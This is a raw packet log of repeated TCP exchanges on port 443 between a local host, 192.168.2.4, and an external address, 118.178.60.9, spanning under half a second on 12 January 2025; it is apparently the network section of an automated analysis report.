Jan 12, 2025 04:12:00.013469934 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.013525963 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.020162106 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.020226955 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.020273924 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.020328999 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.028726101 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.028789997 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.028806925 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.028865099 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.031476021 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.031533957 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.031560898 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.031615019 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.039572001 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.039633036 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.039737940 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.039796114 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.048404932 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.048466921 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.048484087 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.048538923 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.050896883 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.050960064 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.050983906 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.051039934 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.061722994 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.061872005 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.061899900 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.061971903 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.062021971 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.062021971 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.065596104 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.065660000 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.065680027 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.065745115 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.071902037 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.071963072 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.071986914 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.072045088 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.074294090 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.074350119 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.074383974 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.074436903 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.077035904 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.077096939 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.077159882 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.077217102 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.080571890 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.080627918 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.080656052 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.080708981 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.084194899 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.084255934 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.084287882 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.084341049 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.087573051 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.087630033 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.087681055 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.087732077 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.092391014 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.092449903 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.092535019 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.092591047 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.100183010 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.100240946 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.100358009 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.100410938 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.107278109 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.107367039 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.107482910 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.107541084 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.115709066 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.115784883 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.115883112 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.116031885 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.118232012 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.118307114 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.118395090 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.118455887 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.126398087 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.126461983 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.126534939 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.126594067 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.135256052 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.135318995 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.135358095 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.135411978 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.137753010 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.137814999 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.137864113 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.137924910 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.148746967 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.148813963 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.148873091 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.148951054 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.152451038 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.152513027 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.152560949 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.152611971 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.158898115 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.158953905 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.158978939 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.159032106 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.161123037 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.161175013 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.161202908 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.161252975 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.163975000 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.164031029 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.164055109 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.164108992 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.167386055 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.167442083 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.167567015 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.167620897 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.171133995 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.171189070 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.174269915 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.174325943 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.174362898 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.174412966 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.179147005 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.179209948 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.179259062 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.179325104 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.186988115 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.187052011 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.187124014 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.187181950 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.194149971 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.194206953 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.194279909 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.194333076 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.202552080 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.202619076 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.202663898 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.202717066 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.205019951 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.205080032 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.205161095 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.205215931 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.213401079 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.213464022 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.213489056 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.213542938 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.222129107 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.222196102 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.222223997 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.222275019 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.224555969 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.224617958 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.224688053 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.224745989 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.235727072 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.235797882 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.235812902 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.235863924 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.239265919 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.239336967 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.239372015 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.239419937 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.245543957 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.245609999 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.245723963 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.245785952 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.247900963 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.247971058 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.247988939 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.248039007 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.250798941 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.250869036 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.250927925 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.250977993 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.254409075 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.254473925 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.254492998 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.254544020 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.258002043 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.258069992 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.258088112 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.258140087 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.261157036 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.261213064 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.261281013 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.261341095 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.266098976 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.266155005 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.266299009 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.266355991 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.273957968 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.274023056 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.274043083 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.274101973 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.281130075 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.281188965 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.281254053 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.281311035 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.289483070 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.289546013 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.289568901 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.289622068 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.291934967 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.291990042 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.292061090 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.292115927 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.300426960 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.300482035 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.300551891 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.300606012 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.309065104 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.309123993 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.309190989 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.309242964 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.311441898 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.311496973 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.311528921 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.311584949 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.322760105 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.322820902 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.322876930 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.322928905 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.326803923 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.326863050 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.326889992 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.326946974 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.341362000 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.341420889 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.341449976 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.341511965 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.347033978 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.347095966 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.347140074 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.347193003 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.354268074 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.354360104 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.354391098 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.354455948 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.360687971 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.360742092 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.360769033 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.360825062 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.368911982 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.368983984 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.368999958 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.369074106 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.372533083 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.372597933 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.372715950 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.372788906 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.374875069 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.374938965 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.374983072 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.375037909 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.376244068 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.376303911 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.376358986 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.376432896 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.377748966 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.377811909 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.377901077 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.377954960 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.383060932 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.383112907 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.383181095 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.383234978 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.383546114 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.383599043 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.383675098 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.383738041 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.387618065 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.387672901 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.387733936 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.387784958 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.396023035 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.396101952 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.396107912 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.396135092 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.396162987 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.396183968 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.398279905 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.398343086 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.398457050 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.398516893 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.410331964 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.410397053 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.410458088 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.410607100 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.413877964 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.413944006 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.413963079 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.414024115 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.428158045 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.428246975 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.428287983 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.428354979 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.434730053 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.434808016 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.434817076 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.434843063 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.434875011 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.434901953 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.441114902 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.441188097 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.441240072 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.441303968 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.447834969 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.447905064 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.447973013 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.448034048 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.455739975 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.455817938 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.455866098 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.455925941 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.459456921 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.459528923 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.459584951 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.459645033 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.461802959 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.461878061 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.461885929 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.461925983 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.461944103 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.461981058 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.463195086 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.463280916 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.463426113 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.463493109 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.464606047 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.464678049 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.464730024 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.464791059 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.469885111 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.469980001 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.470011950 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.470073938 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.470447063 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.470506907 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.470634937 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.470699072 CET	49992	443	192.168.2.4	118.178.60.9
